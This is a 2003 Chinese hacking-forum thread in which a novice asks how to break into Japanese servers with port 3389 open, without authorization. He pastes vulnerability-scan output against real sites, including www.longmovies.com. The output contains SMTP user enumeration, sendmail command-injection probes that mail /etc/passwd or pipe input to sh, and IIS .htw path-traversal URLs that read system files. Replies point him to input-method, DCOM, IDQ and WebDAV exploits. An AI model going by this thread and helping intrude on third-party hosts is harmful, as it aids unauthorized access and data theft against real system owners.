|
作者: mingming8 [mingming8] 论坛用户 | 登录 |
我扫到一台开3389的主机,日本的! 如我的是XP要在运行里输入cmp 然后在用 K 1 Ip与他相连 但我的机器是98,要怎么办呢??? |
地主 发表时间: 08/15 12:35 |
回复: all528 [all528] 论坛用户 | 登录 |
有专门的终端连接器 WIN系统都可以使用 |
B1层 发表时间: 08/15 15:18 |
回复: tommy_he [tommy_he] 版主 | 登录 |
3389是正常的合法的登陆端口,也需要密码和用户的! 只是打开了是没有用的!你必须有合法的用户和密码才可以进去的! 2K的都有自己的这个程序,一般都是用专门的登陆程序登的才可以! |
B2层 发表时间: 08/15 15:31 |
回复: mingming8 [mingming8] 论坛用户 | 登录 |
是什么名字啊,我又找到一台135和3389同时开放的! |
B3层 发表时间: 08/15 15:32 |
回复: mingming8 [mingming8] 论坛用户 | 登录 |
哦,那要什么程序呢? 有没有哪个是不需要密码的啊! 看我的标题,我应该再哪里输入呢? |
B4层 发表时间: 08/15 15:36 |
回复: tommy_he [tommy_he] 版主 | 登录 |
你可以通过3389进入他的输入界面,但是他要提示你输入密码和用户,这个时候你是没有办法的了!因为没有这个你没有办法的! 没有锁的门你见过吗!?所以没有什么不要密码的,除非哪个白痴傻到无敌的地步了! |
B5层 发表时间: 08/15 16:00 |
回复: mingming8 [mingming8] 论坛用户 | 登录 |
无心好有趣啊! 帮我想想办法,怎么才能进去呢?我连一个肉鸡都没有! 有什么软件能破解密码吗? |
B6层 发表时间: 08/15 16:08 |
回复: mingming8 [mingming8] 论坛用户 | 登录 |
在问一下,如果有权限了,还有把客户端拷贝上去。 但要考哪一个啊,是那个终端服务客户端吗? |
B7层 发表时间: 08/15 16:10 |
回复: tommy_he [tommy_he] 版主 | 登录 |
当然是服务端了,为别人打开服务的啥!可户是使用的哈! 这个和一般的复制粘贴不同哈! |
B8层 发表时间: 08/15 16:14 |
回复: mingming8 [mingming8] 论坛用户 | 登录 |
上传,或copy上去可以么? 有权限时・ |
B9层 发表时间: 08/15 16:30 |
回复: tommy_he [tommy_he] 版主 | 登录 |
可以上传,不可以COPY! 你用自己的内存复制,能调到别人的内存粘贴吗? 有权限也不是这个问题! |
B10层 发表时间: 08/15 16:38 |
回复: mingming8 [mingming8] 论坛用户 | 登录 |
NT弱口令帐户:0 开放端口:25,53,110,135,3389 我可否入侵! 要怎样入侵???谢! |
B11层 发表时间: 08/15 16:43 |
回复: mingming8 [mingming8] 论坛用户 | 登录 |
扫描目标主机开放的端口: 7号端口(未知)开放! 9号端口(未知)开放! 13号端口(未知)开放! 17号端口(未知)开放! 19号端口(未知)开放! 25号端口(未知)开放! 53号端口(未知)开放! 110号端口(未知)开放! 135号端口(未知)开放! 515号端口(未知)开放! 1025号端口(未知)开放! 3389号端口(未知)开放! 开始扫描FTP漏洞: 目标没有开放FTP服务... 开始扫描SMTP漏洞: SMTP服务器的Banner: 220 ATM SERVER MAIL ArGoSoft Mail Server Pro for WinNT/2000/XP, Version 1.8 (1.8.2.5) 214-This is ArGoSoft Mail Server Pro for WinNT/2000/XP, Version 1.8 (1.8.2.5) 214-Following commands are supported: 214-HELO EHLO MAIL RCPT 214-DATA RSET NOOP AUTH-LOGIN 214-EXPN QUIT 214-To report bug, send mail to support@argosoft.com 214 End of HELP 可以使用RCPT命令获得用户名列表. 可以使用EXPN命令获得用户名列表. 尝试利用RCPT命令获得目标机上存在的一些常见用户名: root test www web sybase oracle informix guest sam_exec + oracle8 access user ftp account backup owc datebase public info wais news bbs adm sync john sports china 检查decode别名: 检查漏洞 检查debug漏洞 检查kill漏洞 检查wiz漏洞 检查rcpt to: /tmp/.rhosts漏洞 检查+ +漏洞 检查RSET漏洞 检查mail from: |/bin/mail hacker < /etc/passwd漏洞 检查RSET漏洞 检查mail from: |tail|sh漏洞 开始扫描FINGER漏洞: 目标没有开放FINGER服务... 开始扫描CGI漏洞: 目标没有开放WWW服务... 开始扫描IIS漏洞: 目标没有开放WWW服务... 开始扫描RPC漏洞: 目标没有开放RPC查询服务... 这些说明什么啊! |
B12层 发表时间: 08/15 16:48 |
回复: mingming8 [mingming8] 论坛用户 | 登录 |
扫描目标主机开放的端口: 80号端口(未知)开放! 135号端口(未知)开放! 1025号端口(未知)开放! 开始扫描FTP漏洞: 目标没有开放FTP服务... 开始扫描SMTP漏洞: 目标没有开放SMTP服务... 开始扫描FINGER漏洞: 目标没有开放FINGER服务... 开始扫描CGI漏洞: WWW服务器的Banner: HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Fri, 15 Aug 2003 09:10:23 GMT Connection: Keep-Alive Content-Length: 87395 Content-Type: text/html Set-Cookie: ASPSESSIONIDACRDAASC=NLBOEPDCALOLFLIHEMPAABIG; path=/ Cache-control: private 开始CGI漏洞的扫描,由于扫描漏洞数量较多,请耐心等待... 发现/iishelp/iis/misc/iirturnh.htw漏洞 发现/iissamples/exair/search/qsumrhit.htw漏洞 发现/iissamples/issamples/oop/qfullhit.htw漏洞 发现/iissamples/issamples/oop/qsumrhit.htw漏洞 开始扫描IIS漏洞: WWW服务器的Banner: HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Fri, 15 Aug 2003 09:12:31 GMT Connection: Keep-Alive Content-Length: 87395 Content-Type: text/html Set-Cookie: ASPSESSIONIDACRDAASC=EOBOEPDCGCEGDMKLNDMLFEPL; path=/ Cache-control: private 开始IIS漏洞的扫描,由于扫描漏洞数量较多,请耐心等待... 开始扫描RPC漏洞: 目标没有开放RPC查询服务... |
B13层 发表时间: 08/15 17:24 |
回复: mingming8 [mingming8] 论坛用户 | 登录 |
这是一个电影网站的扫描结果!和上贴是同一个网! 详细资料 【端口信息】: 端口80开放 [Banner] HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Fri, 15 Aug 2003 09:12:35 GMT Connection: Keep-Alive Content-Length: 87395 Content-Type: text/html Set-Cookie: ASPSESSIONIDACRDAASC=FOBOEPDCPDGAPJKOABENGOIH; path=/ Cache-control: private [End of banner] 端口135开放 [Banner] [None] [End of banner] 端口--服务对照表 【RPC检测结果】: Error: Can't contact portmapper. 【SQL-SERVER默认帐户检测结果】: 【FTP弱口令检测结果】: 【NT弱口令用户】: 【CGI检测结果】: /default.asp /iissamples/exair/search/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/config/system.log&CiRestriction=none&CiHiliteType=Full /iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/../../winnt/system32/config/system.log&CiRestriction=none&CiHiliteType=Full /null.htw?CiWebHitsFile=/index.asp%20&CiRestriction=none&CiHiliteType=Full /?wp-cs-dump /?wp-html-rend /?wp-start-ver /?wp-stop-ver /?wp-uncheckout /?wp-usr-prop /?wp-ver-diff /?wp-verify-link /?wp-ver-info 【IIS检测结果】: IIS Index Server(.ida/idq) ISAPI扩展远程溢出漏洞: /null.ida IIS Index Server(.ida/idq) ISAPI扩展远程溢出漏洞: /null.idq IIS 5.0 .printer远程缓冲区溢出漏洞 扫描项目全部完成. |
B14层 发表时间: 08/15 17:37 |
回复: mingming8 [mingming8] 论坛用户 | 登录 |
对令一个网站的扫描!扫描目标主机开放的端口: 21号端口(未知)开放! 23号端口(未知)开放! 25号端口(未知)开放! 79号端口(未知)开放! 80号端口(未知)开放! 111号端口(未知)开放! 513号端口(未知)开放! 514号端口(未知)开放! 开始扫描FTP漏洞: FTP服务器的Banner: 220 www.longmovies.com. FTP server (Version 6.00LS) ready. 测试匿名用户 没有匿名用户 开始扫描SMTP漏洞: SMTP服务器的Banner: 220 longmovies.com ESMTP Sendmail 8.9.3/8.9.3; Fri, 15 Aug 2003 17:52:34 GMT 214-This is Sendmail version 8.9.3 214-Topics: 214- HELO EHLO MAIL RCPT DATA 214- RSET NOOP QUIT HELP VRFY 214- EXPN VERB ETRN DSN 214-For more info use "HELP <topic>". 214-To report bugs in the implementation send email to 214- sendmail-bugs@sendmail.org. 214-For local information send email to Postmaster at your site. 214 End of HELP info 可以使用RCPT命令获得用户名列表. 可以使用VRFY命令获得用户名列表. 可以使用EXPN命令获得用户名列表. 501 HELO requires domain address 250 hacker@hacker.com... Sender ok 尝试利用RCPT命令获得目标机上存在的一些常见用户名: root 250 root... Recipient ok test www 250 www... Recipient ok web sybase oracle informix guest sam_exec + oracle8 access user ftp 250 ftp... Recipient ok account backup owc datebase public info wais news 250 news... Recipient ok bbs adm sync john sports china 检查decode别名: 550 decode... User unknown 500 Command unrecognized: "" 检查漏洞 500 Command unrecognized: "" 检查debug漏洞 500 Command unrecognized: "debug" 检查kill漏洞 500 Command unrecognized: "kill" 检查wiz漏洞 500 Command unrecognized: "wiz" 检查rcpt to: /tmp/.rhosts漏洞 550 /tmp/.rhosts... Cannot mail directly to files 检查+ +漏洞 500 Command unrecognized: "+ +" 检查RSET漏洞 250 Reset state 检查mail from: |/bin/mail hacker < /etc/passwd漏洞 553 |/bin/mail... Invalid sender address 检查RSET漏洞 250 Reset state 检查mail from: |tail|sh漏洞 553 |tail|sh... Invalid sender address 开始扫描FINGER漏洞: 测试SunOS fingerd列出用户名漏洞: finger: 1234: no such user 测试cfingerd执行任意命令漏洞: 测试某些finger服务器执行任意命令漏洞: 测试dot漏洞: 开始扫描CGI漏洞: WWW服务器的Banner: HTTP/1.1 200 OK Date: Fri, 15 Aug 2003 17:53:41 GMT Server: Apache/1.3.9 (Unix) Connection: close Content-Type: text/html 开始CGI漏洞的扫描,由于扫描漏洞数量较多,请耐心等待... 开始扫描IIS漏洞: WWW服务器的Banner: HTTP/1.1 200 OK Date: Fri, 15 Aug 2003 17:56:07 GMT Server: Apache/1.3.9 (Unix) Connection: close Content-Type: text/html 开始IIS漏洞的扫描,由于扫描漏洞数量较多,请耐心等待... 开始扫描RPC漏洞: |
B15层 发表时间: 08/15 17:41 |
回复: woainiwjy [woainiwjy] 论坛用户 | 登录 |
不是有输入法漏洞吗~~笨笨~ |
B16层 发表时间: 08/15 18:50 |
回复: mingming8 [mingming8] 论坛用户 | 登录 |
我不会啊! |
B17层 发表时间: 08/15 21:25 |
回复: woainiwjy [woainiwjy] 论坛用户 | 登录 |
看教程啊~~你去GOOGLE收一下就可以了,这个你不能不会吧~~ |
B18层 发表时间: 08/16 17:33 |
回复: mingming8 [mingming8] 论坛用户 | 登录 |
如果我说不会你会怎么样??? |
B19层 发表时间: 08/23 13:24 |
回复: fu414 [fu414] 论坛用户 | 登录 |
K,狂K一顿,上面好像有个IDQ溢出的鸡鸡,用IDQ溢出工具试试 |
B20层 发表时间: 08/28 02:21 |
回复: game120 [game120] 论坛用户 | 登录 |
哎呀 日本的服务器没有3389漏洞的拉 因为别人都不用我们的输入法拉 |
B21层 发表时间: 08/28 09:35 |
回复: jamesgj [jamesgj] 论坛用户 | 登录 |
现在还有几台机器有什么输入法漏洞哦,好久的事情了哦!有135的话可以利用DCOM的漏洞,如果他没有打补丁的话!呵呵!:) |
B22层 发表时间: 08/28 11:52 |
回复: mingming8 [mingming8] 论坛用户 | 登录 |
我是好孩子,已经不搞这些了。 搞不明白! |
B23层 发表时间: 08/29 22:17 |
回复: guawoo [guawoo] 论坛用户 | 登录 |
我倒,有iis漏洞!用webdav溢出仨! 局外话:你真有福,我一台肉鸡都没扫到:( |
B24层 发表时间: 08/29 22:40 |
回复: mingming8 [mingming8] 论坛用户 | 登录 |
我说过我学好了,你想要我给你 |
B25层 发表时间: 08/29 22:52 |
回复: k_com [k_com] 论坛用户 | 登录 |
倒啊~~楼上,给点信心自己啊~~网上的文章多得是啊`~~ |
B26层 发表时间: 08/30 03:56 |
回复: naster [naster] 论坛用户 | 登录 |
用输入法漏洞肯定办不到(除非没打SP3补丁),然后就是你用什么办法来获取ADMIN权限的问题了,方法有很多,具体我就不说了,嘿嘿~~ |
B27层 发表时间: 08/30 09:42 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号